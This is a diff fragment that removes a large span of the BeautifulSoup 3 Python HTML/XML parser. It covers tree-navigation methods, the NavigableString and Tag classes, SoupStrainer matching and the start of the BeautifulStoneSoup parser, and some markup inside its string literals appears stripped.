self.nextSibling = None - if self.parent and self.parent.contents: - self.previousSibling = self.parent.contents[-1] - self.previousSibling.nextSibling = self - - def replaceWith(self, replaceWith): - oldParent = self.parent - myIndex = self.parent.index(self) - if hasattr(replaceWith, "parent")\ - and replaceWith.parent is self.parent: - # We're replacing this element with one of its siblings. 
- index = replaceWith.parent.index(replaceWith) - if index and index < myIndex: - # Furthermore, it comes before this element. That - # means that when we extract it, the index of this - # element will change. - myIndex = myIndex - 1 - self.extract() - oldParent.insert(myIndex, replaceWith) - - def replaceWithChildren(self): - myParent = self.parent - myIndex = self.parent.index(self) - self.extract() - reversedChildren = list(self.contents) - reversedChildren.reverse() - for child in reversedChildren: - myParent.insert(myIndex, child) - - def extract(self): - """Destructively rips this element out of the tree.""" - if self.parent: - try: - del self.parent.contents[self.parent.index(self)] - except ValueError: - pass - - #Find the two elements that would be next to each other if - #this element (and any children) hadn't been parsed. Connect - #the two. - lastChild = self._lastRecursiveChild() - nextElement = lastChild.next - - if self.previous: - self.previous.next = nextElement - if nextElement: - nextElement.previous = self.previous - self.previous = None - lastChild.next = None - - self.parent = None - if self.previousSibling: - self.previousSibling.nextSibling = self.nextSibling - if self.nextSibling: - self.nextSibling.previousSibling = self.previousSibling - self.previousSibling = self.nextSibling = None - return self - - def _lastRecursiveChild(self): - "Finds the last element beneath this object to be parsed." - lastChild = self - while hasattr(lastChild, 'contents') and lastChild.contents: - lastChild = lastChild.contents[-1] - return lastChild - - def insert(self, position, newChild): - if isinstance(newChild, basestring) \ - and not isinstance(newChild, NavigableString): - newChild = NavigableString(newChild) - - position = min(position, len(self.contents)) - if hasattr(newChild, 'parent') and newChild.parent is not None: - # We're 'inserting' an element that's already one - # of this object's children. 
- if newChild.parent is self: - index = self.index(newChild) - if index > position: - # Furthermore we're moving it further down the - # list of this object's children. That means that - # when we extract this element, our target index - # will jump down one. - position = position - 1 - newChild.extract() - - newChild.parent = self - previousChild = None - if position == 0: - newChild.previousSibling = None - newChild.previous = self - else: - previousChild = self.contents[position-1] - newChild.previousSibling = previousChild - newChild.previousSibling.nextSibling = newChild - newChild.previous = previousChild._lastRecursiveChild() - if newChild.previous: - newChild.previous.next = newChild - - newChildsLastElement = newChild._lastRecursiveChild() - - if position >= len(self.contents): - newChild.nextSibling = None - - parent = self - parentsNextSibling = None - while not parentsNextSibling: - parentsNextSibling = parent.nextSibling - parent = parent.parent - if not parent: # This is the last element in the document. 
- break - if parentsNextSibling: - newChildsLastElement.next = parentsNextSibling - else: - newChildsLastElement.next = None - else: - nextChild = self.contents[position] - newChild.nextSibling = nextChild - if newChild.nextSibling: - newChild.nextSibling.previousSibling = newChild - newChildsLastElement.next = nextChild - - if newChildsLastElement.next: - newChildsLastElement.next.previous = newChildsLastElement - self.contents.insert(position, newChild) - - def append(self, tag): - """Appends the given tag to the contents of this tag.""" - self.insert(len(self.contents), tag) - - def findNext(self, name=None, attrs={}, text=None, **kwargs): - """Returns the first item that matches the given criteria and - appears after this Tag in the document.""" - return self._findOne(self.findAllNext, name, attrs, text, **kwargs) - - def findAllNext(self, name=None, attrs={}, text=None, limit=None, - **kwargs): - """Returns all items that match the given criteria and appear - after this Tag in the document.""" - return self._findAll(name, attrs, text, limit, self.nextGenerator, - **kwargs) - - def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): - """Returns the closest sibling to this Tag that matches the - given criteria and appears after this Tag in the document.""" - return self._findOne(self.findNextSiblings, name, attrs, text, - **kwargs) - - def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, - **kwargs): - """Returns the siblings of this Tag that match the given - criteria and appear after this Tag in the document.""" - return self._findAll(name, attrs, text, limit, - self.nextSiblingGenerator, **kwargs) - fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x - - def findPrevious(self, name=None, attrs={}, text=None, **kwargs): - """Returns the first item that matches the given criteria and - appears before this Tag in the document.""" - return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) - - def 
findAllPrevious(self, name=None, attrs={}, text=None, limit=None, - **kwargs): - """Returns all items that match the given criteria and appear - before this Tag in the document.""" - return self._findAll(name, attrs, text, limit, self.previousGenerator, - **kwargs) - fetchPrevious = findAllPrevious # Compatibility with pre-3.x - - def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): - """Returns the closest sibling to this Tag that matches the - given criteria and appears before this Tag in the document.""" - return self._findOne(self.findPreviousSiblings, name, attrs, text, - **kwargs) - - def findPreviousSiblings(self, name=None, attrs={}, text=None, - limit=None, **kwargs): - """Returns the siblings of this Tag that match the given - criteria and appear before this Tag in the document.""" - return self._findAll(name, attrs, text, limit, - self.previousSiblingGenerator, **kwargs) - fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x - - def findParent(self, name=None, attrs={}, **kwargs): - """Returns the closest parent of this Tag that matches the given - criteria.""" - # NOTE: We can't use _findOne because findParents takes a different - # set of arguments. - r = None - l = self.findParents(name, attrs, 1) - if l: - r = l[0] - return r - - def findParents(self, name=None, attrs={}, limit=None, **kwargs): - """Returns the parents of this Tag that match the given - criteria.""" - - return self._findAll(name, attrs, None, limit, self.parentGenerator, - **kwargs) - fetchParents = findParents # Compatibility with pre-3.x - - #These methods do the real heavy lifting. - - def _findOne(self, method, name, attrs, text, **kwargs): - r = None - l = method(name, attrs, text, 1, **kwargs) - if l: - r = l[0] - return r - - def _findAll(self, name, attrs, text, limit, generator, **kwargs): - "Iterates over a generator looking for things that match." 
- - if isinstance(name, SoupStrainer): - strainer = name - # (Possibly) special case some findAll*(...) searches - elif text is None and not limit and not attrs and not kwargs: - # findAll*(True) - if name is True: - return [element for element in generator() - if isinstance(element, Tag)] - # findAll*('tag-name') - elif isinstance(name, basestring): - return [element for element in generator() - if isinstance(element, Tag) and - element.name == name] - else: - strainer = SoupStrainer(name, attrs, text, **kwargs) - # Build a SoupStrainer - else: - strainer = SoupStrainer(name, attrs, text, **kwargs) - results = ResultSet(strainer) - g = generator() - while True: - try: - i = g.next() - except StopIteration: - break - if i: - found = strainer.search(i) - if found: - results.append(found) - if limit and len(results) >= limit: - break - return results - - #These Generators can be used to navigate starting from both - #NavigableStrings and Tags. - def nextGenerator(self): - i = self - while i is not None: - i = i.next - yield i - - def nextSiblingGenerator(self): - i = self - while i is not None: - i = i.nextSibling - yield i - - def previousGenerator(self): - i = self - while i is not None: - i = i.previous - yield i - - def previousSiblingGenerator(self): - i = self - while i is not None: - i = i.previousSibling - yield i - - def parentGenerator(self): - i = self - while i is not None: - i = i.parent - yield i - - # Utility methods - def substituteEncoding(self, str, encoding=None): - encoding = encoding or "utf-8" - return str.replace("%SOUP-ENCODING%", encoding) - - def toEncoding(self, s, encoding=None): - """Encodes an object to a string in some encoding, or to Unicode. 
- .""" - if isinstance(s, unicode): - if encoding: - s = s.encode(encoding) - elif isinstance(s, str): - if encoding: - s = s.encode(encoding) - else: - s = unicode(s) - else: - if encoding: - s = self.toEncoding(str(s), encoding) - else: - s = unicode(s) - return s - - BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" - + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" - + ")") - - def _sub_entity(self, x): - """Used with a regular expression to substitute the - appropriate XML entity for an XML special character.""" - return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" - - -class NavigableString(unicode, PageElement): - - def __new__(cls, value): - """Create a new NavigableString. - - When unpickling a NavigableString, this method is called with - the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be - passed in to the superclass's __new__ or the superclass won't know - how to handle non-ASCII characters. - """ - if isinstance(value, unicode): - return unicode.__new__(cls, value) - return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) - - def __getnewargs__(self): - return (NavigableString.__str__(self),) - - def __getattr__(self, attr): - """text.string gives you text. This is for backwards - compatibility for Navigable*String, but for CData* it lets you - get the string without the CData wrapper.""" - if attr == 'string': - return self - else: - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) - - def __unicode__(self): - return str(self).decode(DEFAULT_OUTPUT_ENCODING) - - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - # Substitute outgoing XML entities. 
- data = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, self) - if encoding: - return data.encode(encoding) - else: - return data - -class CData(NavigableString): - - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - return "" % NavigableString.__str__(self, encoding) - -class ProcessingInstruction(NavigableString): - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - output = self - if "%SOUP-ENCODING%" in output: - output = self.substituteEncoding(output, encoding) - return "" % self.toEncoding(output, encoding) - -class Comment(NavigableString): - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - return "" % NavigableString.__str__(self, encoding) - -class Declaration(NavigableString): - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - return "" % NavigableString.__str__(self, encoding) - -class Tag(PageElement): - - """Represents a found HTML tag with its attributes and contents.""" - - def _convertEntities(self, match): - """Used in a call to re.sub to replace HTML, XML, and numeric - entities with the appropriate Unicode characters. If HTML - entities are being converted, any unrecognized entities are - escaped.""" - x = match.group(1) - if self.convertHTMLEntities and x in name2codepoint: - return unichr(name2codepoint[x]) - elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: - if self.convertXMLEntities: - return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] - else: - return u'&%s;' % x - elif len(x) > 0 and x[0] == '#': - # Handle numeric entities - if len(x) > 1 and x[1] == 'x': - return unichr(int(x[2:], 16)) - else: - return unichr(int(x[1:])) - - elif self.escapeUnrecognizedEntities: - return u'&%s;' % x - else: - return u'&%s;' % x - - def __init__(self, parser, name, attrs=None, parent=None, - previous=None): - "Basic constructor." 
- - # We don't actually store the parser object: that lets extracted - # chunks be garbage-collected - self.parserClass = parser.__class__ - self.isSelfClosing = parser.isSelfClosingTag(name) - self.name = name - if attrs is None: - attrs = [] - elif isinstance(attrs, dict): - attrs = attrs.items() - self.attrs = attrs - self.contents = [] - self.setup(parent, previous) - self.hidden = False - self.containsSubstitutions = False - self.convertHTMLEntities = parser.convertHTMLEntities - self.convertXMLEntities = parser.convertXMLEntities - self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities - - # Convert any HTML, XML, or numeric entities in the attribute values. - convert = lambda(k, val): (k, - re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", - self._convertEntities, - val)) - self.attrs = map(convert, self.attrs) - - def getString(self): - if (len(self.contents) == 1 - and isinstance(self.contents[0], NavigableString)): - return self.contents[0] - - def setString(self, string): - """Replace the contents of the tag with a string""" - self.clear() - self.append(string) - - string = property(getString, setString) - - def getText(self, separator=u""): - if not len(self.contents): - return u"" - stopNode = self._lastRecursiveChild().next - strings = [] - current = self.contents[0] - while current is not stopNode: - if isinstance(current, NavigableString): - strings.append(current.strip()) - current = current.next - return separator.join(strings) - - text = property(getText) - - def get(self, key, default=None): - """Returns the value of the 'key' attribute for the tag, or - the value given for 'default' if it doesn't have that - attribute.""" - return self._getAttrMap().get(key, default) - - def clear(self): - """Extract all children.""" - for child in self.contents[:]: - child.extract() - - def index(self, element): - for i, child in enumerate(self.contents): - if child is element: - return i - raise ValueError("Tag.index: element not in tag") - - def 
has_key(self, key): - return self._getAttrMap().has_key(key) - - def __getitem__(self, key): - """tag[key] returns the value of the 'key' attribute for the tag, - and throws an exception if it's not there.""" - return self._getAttrMap()[key] - - def __iter__(self): - "Iterating over a tag iterates over its contents." - return iter(self.contents) - - def __len__(self): - "The length of a tag is the length of its list of contents." - return len(self.contents) - - def __contains__(self, x): - return x in self.contents - - def __nonzero__(self): - "A tag is non-None even if it has no contents." - return True - - def __setitem__(self, key, value): - """Setting tag[key] sets the value of the 'key' attribute for the - tag.""" - self._getAttrMap() - self.attrMap[key] = value - found = False - for i in xrange(0, len(self.attrs)): - if self.attrs[i][0] == key: - self.attrs[i] = (key, value) - found = True - if not found: - self.attrs.append((key, value)) - self._getAttrMap()[key] = value - - def __delitem__(self, key): - "Deleting tag[key] deletes all 'key' attributes for the tag." - for item in self.attrs: - if item[0] == key: - self.attrs.remove(item) - #We don't break because bad HTML can define the same - #attribute multiple times. - self._getAttrMap() - if self.attrMap.has_key(key): - del self.attrMap[key] - - def __call__(self, *args, **kwargs): - """Calling a tag like a function is the same as calling its - findAll() method. Eg. 
tag('a') returns a list of all the A tags - found within this tag.""" - return apply(self.findAll, args, kwargs) - - def __getattr__(self, tag): - #print "Getattr %s.%s" % (self.__class__, tag) - if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: - return self.find(tag[:-3]) - elif tag.find('__') != 0: - return self.find(tag) - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) - - def __eq__(self, other): - """Returns true iff this tag has the same name, the same attributes, - and the same contents (recursively) as the given tag. - - NOTE: right now this will return false if two tags have the - same attributes in a different order. Should this be fixed?""" - if other is self: - return True - if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): - return False - for i in xrange(0, len(self.contents)): - if self.contents[i] != other.contents[i]: - return False - return True - - def __ne__(self, other): - """Returns true iff this tag is not identical to the other tag, - as defined in __eq__.""" - return not self == other - - def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): - """Renders this tag as a string.""" - return self.__str__(encoding) - - def __unicode__(self): - return self.__str__(None) - - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, - prettyPrint=False, indentLevel=0): - """Returns a string or Unicode representation of this tag and - its contents. To get Unicode, pass None for encoding. 
- - NOTE: since Python's HTML parser consumes whitespace, this - method is not certain to reproduce the whitespace present in - the original string.""" - - encodedName = self.toEncoding(self.name, encoding) - - attrs = [] - if self.attrs: - for key, val in self.attrs: - fmt = '%s="%s"' - if isinstance(val, basestring): - if self.containsSubstitutions and '%SOUP-ENCODING%' in val: - val = self.substituteEncoding(val, encoding) - - # The attribute value either: - # - # * Contains no embedded double quotes or single quotes. - # No problem: we enclose it in double quotes. - # * Contains embedded single quotes. No problem: - # double quotes work here too. - # * Contains embedded double quotes. No problem: - # we enclose it in single quotes. - # * Embeds both single _and_ double quotes. This - # can't happen naturally, but it can happen if - # you modify an attribute value after parsing - # the document. Now we have a bit of a - # problem. We solve it by enclosing the - # attribute in single quotes, and escaping any - # embedded single quotes to XML entities. - if '"' in val: - fmt = "%s='%s'" - if "'" in val: - # TODO: replace with apos when - # appropriate. - val = val.replace("'", "&squot;") - - # Now we're okay w/r/t quotes. But the attribute - # value might also contain angle brackets, or - # ampersands that aren't part of entities. We need - # to escape those to XML entities too. 
- val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) - - attrs.append(fmt % (self.toEncoding(key, encoding), - self.toEncoding(val, encoding))) - close = '' - closeTag = '' - if self.isSelfClosing: - close = ' /' - else: - closeTag = '' % encodedName - - indentTag, indentContents = 0, 0 - if prettyPrint: - indentTag = indentLevel - space = (' ' * (indentTag-1)) - indentContents = indentTag + 1 - contents = self.renderContents(encoding, prettyPrint, indentContents) - if self.hidden: - s = contents - else: - s = [] - attributeString = '' - if attrs: - attributeString = ' ' + ' '.join(attrs) - if prettyPrint: - s.append(space) - s.append('<%s%s%s>' % (encodedName, attributeString, close)) - if prettyPrint: - s.append("\n") - s.append(contents) - if prettyPrint and contents and contents[-1] != "\n": - s.append("\n") - if prettyPrint and closeTag: - s.append(space) - s.append(closeTag) - if prettyPrint and closeTag and self.nextSibling: - s.append("\n") - s = ''.join(s) - return s - - def decompose(self): - """Recursively destroys the contents of this tree.""" - self.extract() - if len(self.contents) == 0: - return - current = self.contents[0] - while current is not None: - next = current.next - if isinstance(current, Tag): - del current.contents[:] - current.parent = None - current.previous = None - current.previousSibling = None - current.next = None - current.nextSibling = None - current = next - - def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): - return self.__str__(encoding, True) - - def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, - prettyPrint=False, indentLevel=0): - """Renders the contents of this tag as a string in the given - encoding. 
If encoding is None, returns a Unicode string..""" - s=[] - for c in self: - text = None - if isinstance(c, NavigableString): - text = c.__str__(encoding) - elif isinstance(c, Tag): - s.append(c.__str__(encoding, prettyPrint, indentLevel)) - if text and prettyPrint: - text = text.strip() - if text: - if prettyPrint: - s.append(" " * (indentLevel-1)) - s.append(text) - if prettyPrint: - s.append("\n") - return ''.join(s) - - #Soup methods - - def find(self, name=None, attrs={}, recursive=True, text=None, - **kwargs): - """Return only the first child of this Tag matching the given - criteria.""" - r = None - l = self.findAll(name, attrs, recursive, text, 1, **kwargs) - if l: - r = l[0] - return r - findChild = find - - def findAll(self, name=None, attrs={}, recursive=True, text=None, - limit=None, **kwargs): - """Extracts a list of Tag objects that match the given - criteria. You can specify the name of the Tag and any - attributes you want the Tag to have. - - The value of a key-value pair in the 'attrs' map can be a - string, a list of strings, a regular expression object, or a - callable that takes a string and returns whether or not the - string matches for some custom definition of 'matches'. 
The - same is true of the tag name.""" - generator = self.recursiveChildGenerator - if not recursive: - generator = self.childGenerator - return self._findAll(name, attrs, text, limit, generator, **kwargs) - findChildren = findAll - - # Pre-3.x compatibility methods - first = find - fetch = findAll - - def fetchText(self, text=None, recursive=True, limit=None): - return self.findAll(text=text, recursive=recursive, limit=limit) - - def firstText(self, text=None, recursive=True): - return self.find(text=text, recursive=recursive) - - #Private methods - - def _getAttrMap(self): - """Initializes a map representation of this tag's attributes, - if not already initialized.""" - if not getattr(self, 'attrMap'): - self.attrMap = {} - for (key, value) in self.attrs: - self.attrMap[key] = value - return self.attrMap - - #Generator methods - def childGenerator(self): - # Just use the iterator from the contents - return iter(self.contents) - - def recursiveChildGenerator(self): - if not len(self.contents): - raise StopIteration - stopNode = self._lastRecursiveChild().next - current = self.contents[0] - while current is not stopNode: - yield current - current = current.next - - -# Next, a couple classes to represent queries and their results. 
-class SoupStrainer: - """Encapsulates a number of ways of matching a markup element (tag or - text).""" - - def __init__(self, name=None, attrs={}, text=None, **kwargs): - self.name = name - if isinstance(attrs, basestring): - kwargs['class'] = _match_css_class(attrs) - attrs = None - if kwargs: - if attrs: - attrs = attrs.copy() - attrs.update(kwargs) - else: - attrs = kwargs - self.attrs = attrs - self.text = text - - def __str__(self): - if self.text: - return self.text - else: - return "%s|%s" % (self.name, self.attrs) - - def searchTag(self, markupName=None, markupAttrs={}): - found = None - markup = None - if isinstance(markupName, Tag): - markup = markupName - markupAttrs = markup - callFunctionWithTagData = callable(self.name) \ - and not isinstance(markupName, Tag) - - if (not self.name) \ - or callFunctionWithTagData \ - or (markup and self._matches(markup, self.name)) \ - or (not markup and self._matches(markupName, self.name)): - if callFunctionWithTagData: - match = self.name(markupName, markupAttrs) - else: - match = True - markupAttrMap = None - for attr, matchAgainst in self.attrs.items(): - if not markupAttrMap: - if hasattr(markupAttrs, 'get'): - markupAttrMap = markupAttrs - else: - markupAttrMap = {} - for k,v in markupAttrs: - markupAttrMap[k] = v - attrValue = markupAttrMap.get(attr) - if not self._matches(attrValue, matchAgainst): - match = False - break - if match: - if markup: - found = markup - else: - found = markupName - return found - - def search(self, markup): - #print 'looking for %s in %s' % (self, markup) - found = None - # If given a list of items, scan it for a text element that - # matches. - if hasattr(markup, "__iter__") \ - and not isinstance(markup, Tag): - for element in markup: - if isinstance(element, NavigableString) \ - and self.search(element): - found = element - break - # If it's a Tag, make sure its name or attributes match. - # Don't bother with Tags if we're searching for text. 
- elif isinstance(markup, Tag): - if not self.text: - found = self.searchTag(markup) - # If it's text, make sure the text matches. - elif isinstance(markup, NavigableString) or \ - isinstance(markup, basestring): - if self._matches(markup, self.text): - found = markup - else: - raise Exception, "I don't know how to match against a %s" \ - % markup.__class__ - return found - - def _matches(self, markup, matchAgainst): - #print "Matching %s against %s" % (markup, matchAgainst) - result = False - if matchAgainst is True: - result = markup is not None - elif callable(matchAgainst): - result = matchAgainst(markup) - else: - #Custom match methods take the tag as an argument, but all - #other ways of matching match the tag name as a string. - if isinstance(markup, Tag): - markup = markup.name - if markup and not isinstance(markup, basestring): - markup = unicode(markup) - #Now we know that chunk is either a string, or None. - if hasattr(matchAgainst, 'match'): - # It's a regexp object. - result = markup and matchAgainst.search(markup) - elif hasattr(matchAgainst, '__iter__'): # list-like - result = markup in matchAgainst - elif hasattr(matchAgainst, 'items'): - result = markup.has_key(matchAgainst) - elif matchAgainst and isinstance(markup, basestring): - if isinstance(markup, unicode): - matchAgainst = unicode(matchAgainst) - else: - matchAgainst = str(matchAgainst) - - if not result: - result = matchAgainst == markup - return result - -class ResultSet(list): - """A ResultSet is just a list that keeps track of the SoupStrainer - that created it.""" - def __init__(self, source): - list.__init__([]) - self.source = source - -# Now, some helper functions. - -def buildTagMap(default, *args): - """Turns a list of maps, lists, or scalars into a single map. - Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and - NESTING_RESET_TAGS maps out of lists and partial maps.""" - built = {} - for portion in args: - if hasattr(portion, 'items'): - #It's a map. Merge it. 
- for k,v in portion.items(): - built[k] = v - elif hasattr(portion, '__iter__'): # is a list - #It's a list. Map each item to the default. - for k in portion: - built[k] = default - else: - #It's a scalar. Map it to the default. - built[portion] = default - return built - -# Now, the parser classes. - -class BeautifulStoneSoup(Tag, SGMLParser): - - """This class contains the basic parser and search code. It defines - a parser that knows nothing about tag behavior except for the - following: - - You can't close a tag without closing all the tags it encloses. - That is, "" actually means - "". - - [Another possible explanation is "", but since - this class defines no SELF_CLOSING_TAGS, it will never use that - explanation.] - - This class is useful for parsing XML or made-up markup languages, - or when BeautifulSoup makes an assumption counter to what you were - expecting.""" - - SELF_CLOSING_TAGS = {} - NESTABLE_TAGS = {} - RESET_NESTING_TAGS = {} - QUOTE_TAGS = {} - PRESERVE_WHITESPACE_TAGS = [] - - MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), - lambda x: x.group(1) + ' />'), - (re.compile(']*)>'), - lambda x: '') - ] - - ROOT_TAG_NAME = u'[document]' - - HTML_ENTITIES = "html" - XML_ENTITIES = "xml" - XHTML_ENTITIES = "xhtml" - # TODO: This only exists for backwards-compatibility - ALL_ENTITIES = XHTML_ENTITIES - - # Used when determining whether a text node is all whitespace and - # can be replaced with a single space. A text node that contains - # fancy Unicode spaces (usually non-breaking) should be left - # alone. - STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } - - def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, - markupMassage=True, smartQuotesTo=XML_ENTITIES, - convertEntities=None, selfClosingTags=None, isHTML=False): - """The Soup object is initialized as the 'root tag', and the - provided markup (which can be a string or a file-like object) - is fed into the underlying parser. 
- - sgmllib will process most bad HTML, and the BeautifulSoup - class has some tricks for dealing with some HTML that kills - sgmllib, but Beautiful Soup can nonetheless choke or lose data - if your data uses self-closing tags or declarations - incorrectly. - - By default, Beautiful Soup uses regexes to sanitize input, - avoiding the vast majority of these problems. If the problems - don't apply to you, pass in False for markupMassage, and - you'll get better performance. - - The default parser massage techniques fix the two most common - instances of invalid HTML that choke sgmllib: - -
    (No space between name of closing tag and tag close) - (Extraneous whitespace in declaration) - - You can pass in a custom list of (RE object, replace method) - tuples to get Beautiful Soup to scrub your input the way you - want.""" - - self.parseOnlyThese = parseOnlyThese - self.fromEncoding = fromEncoding - self.smartQuotesTo = smartQuotesTo - self.convertEntities = convertEntities - # Set the rules for how we'll deal with the entities we - # encounter - if self.convertEntities: - # It doesn't make sense to convert encoded characters to - # entities even while you're converting entities to Unicode. - # Just convert it all to Unicode. - self.smartQuotesTo = None - if convertEntities == self.HTML_ENTITIES: - self.convertXMLEntities = False - self.convertHTMLEntities = True - self.escapeUnrecognizedEntities = True - elif convertEntities == self.XHTML_ENTITIES: - self.convertXMLEntities = True - self.convertHTMLEntities = True - self.escapeUnrecognizedEntities = False - elif convertEntities == self.XML_ENTITIES: - self.convertXMLEntities = True - self.convertHTMLEntities = False - self.escapeUnrecognizedEntities = False - else: - self.convertXMLEntities = False - self.convertHTMLEntities = False - self.escapeUnrecognizedEntities = False - - self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) - SGMLParser.__init__(self) - - if hasattr(markup, 'read'): # It's a file-type object. - markup = markup.read() - self.markup = markup - self.markupMassage = markupMassage - try: - self._feed(isHTML=isHTML) - except StopParsing: - pass - self.markup = None # The markup can now be GCed - - def convert_charref(self, name): - """This method fixes a bug in Python's SGMLParser.""" - try: - n = int(name) - except ValueError: - return - if not 0 <= n <= 127 : # ASCII ends at 127, not 255 - return - return self.convert_codepoint(n) - - def _feed(self, inDocumentEncoding=None, isHTML=False): - # Convert the document to Unicode. 
- markup = self.markup - if isinstance(markup, unicode): - if not hasattr(self, 'originalEncoding'): - self.originalEncoding = None - else: - dammit = UnicodeDammit\ - (markup, [self.fromEncoding, inDocumentEncoding], - smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) - markup = dammit.unicode - self.originalEncoding = dammit.originalEncoding - self.declaredHTMLEncoding = dammit.declaredHTMLEncoding - if markup: - if self.markupMassage: - if not hasattr(self.markupMassage, "__iter__"): - self.markupMassage = self.MARKUP_MASSAGE - for fix, m in self.markupMassage: - markup = fix.sub(m, markup) - # TODO: We get rid of markupMassage so that the - # soup object can be deepcopied later on. Some - # Python installations can't copy regexes. If anyone - # was relying on the existence of markupMassage, this - # might cause problems. - del(self.markupMassage) - self.reset() - - SGMLParser.feed(self, markup) - # Close out any unfinished strings and close all the open tags. - self.endData() - while self.currentTag.name != self.ROOT_TAG_NAME: - self.popTag() - - def __getattr__(self, methodName): - """This method routes method call requests to either the SGMLParser - superclass or the Tag superclass, depending on the method name.""" - #print "__getattr__ called on %s.%s" % (self.__class__, methodName) - - if methodName.startswith('start_') or methodName.startswith('end_') \ - or methodName.startswith('do_'): - return SGMLParser.__getattr__(self, methodName) - elif not methodName.startswith('__'): - return Tag.__getattr__(self, methodName) - else: - raise AttributeError - - def isSelfClosingTag(self, name): - """Returns true iff the given string is the name of a - self-closing tag according to this parser.""" - return self.SELF_CLOSING_TAGS.has_key(name) \ - or self.instanceSelfClosingTags.has_key(name) - - def reset(self): - Tag.__init__(self, self, self.ROOT_TAG_NAME) - self.hidden = 1 - SGMLParser.reset(self) - self.currentData = [] - self.currentTag = None - self.tagStack = 
[] - self.quoteStack = [] - self.pushTag(self) - - def popTag(self): - tag = self.tagStack.pop() - - #print "Pop", tag.name - if self.tagStack: - self.currentTag = self.tagStack[-1] - return self.currentTag - - def pushTag(self, tag): - #print "Push", tag.name - if self.currentTag: - self.currentTag.contents.append(tag) - self.tagStack.append(tag) - self.currentTag = self.tagStack[-1] - - def endData(self, containerClass=NavigableString): - if self.currentData: - currentData = u''.join(self.currentData) - if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and - not set([tag.name for tag in self.tagStack]).intersection( - self.PRESERVE_WHITESPACE_TAGS)): - if '\n' in currentData: - currentData = '\n' - else: - currentData = ' ' - self.currentData = [] - if self.parseOnlyThese and len(self.tagStack) <= 1 and \ - (not self.parseOnlyThese.text or \ - not self.parseOnlyThese.search(currentData)): - return - o = containerClass(currentData) - o.setup(self.currentTag, self.previous) - if self.previous: - self.previous.next = o - self.previous = o - self.currentTag.contents.append(o) - - - def _popToTag(self, name, inclusivePop=True): - """Pops the tag stack up to and including the most recent - instance of the given tag. 
If inclusivePop is false, pops the tag - stack up to but *not* including the most recent instqance of - the given tag.""" - #print "Popping to %s" % name - if name == self.ROOT_TAG_NAME: - return - - numPops = 0 - mostRecentTag = None - for i in xrange(len(self.tagStack)-1, 0, -1): - if name == self.tagStack[i].name: - numPops = len(self.tagStack)-i - break - if not inclusivePop: - numPops = numPops - 1 - - for i in xrange(0, numPops): - mostRecentTag = self.popTag() - return mostRecentTag - - def _smartPop(self, name): - - """We need to pop up to the previous tag of this type, unless - one of this tag's nesting reset triggers comes between this - tag and the previous tag of this type, OR unless this tag is a - generic nesting trigger and another generic nesting trigger - comes between this tag and the previous tag of this type. - - Examples: -

    FooBar *

    * should pop to 'p', not 'b'. -

    FooBar *

    * should pop to 'table', not 'p'. -

    Foo

    Bar *

    * should pop to 'tr', not 'p'. - -

    • *
    • * should pop to 'ul', not the first 'li'. -
  • ** should pop to 'table', not the first 'tr' - tag should - implicitly close the previous tag within the same
    ** should pop to 'tr', not the first 'td' - """ - - nestingResetTriggers = self.NESTABLE_TAGS.get(name) - isNestable = nestingResetTriggers != None - isResetNesting = self.RESET_NESTING_TAGS.has_key(name) - popTo = None - inclusive = True - for i in xrange(len(self.tagStack)-1, 0, -1): - p = self.tagStack[i] - if (not p or p.name == name) and not isNestable: - #Non-nestable tags get popped to the top or to their - #last occurance. - popTo = name - break - if (nestingResetTriggers is not None - and p.name in nestingResetTriggers) \ - or (nestingResetTriggers is None and isResetNesting - and self.RESET_NESTING_TAGS.has_key(p.name)): - - #If we encounter one of the nesting reset triggers - #peculiar to this tag, or we encounter another tag - #that causes nesting to reset, pop up to but not - #including that tag. - popTo = p.name - inclusive = False - break - p = p.parent - if popTo: - self._popToTag(popTo, inclusive) - - def unknown_starttag(self, name, attrs, selfClosing=0): - #print "Start tag %s: %s" % (name, attrs) - if self.quoteStack: - #This is not a real tag. - #print "<%s> is not real!" % name - attrs = ''.join([' %s="%s"' % (x, y) for x, y in attrs]) - self.handle_data('<%s%s>' % (name, attrs)) - return - self.endData() - - if not self.isSelfClosingTag(name) and not selfClosing: - self._smartPop(name) - - if self.parseOnlyThese and len(self.tagStack) <= 1 \ - and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): - return - - tag = Tag(self, name, attrs, self.currentTag, self.previous) - if self.previous: - self.previous.next = tag - self.previous = tag - 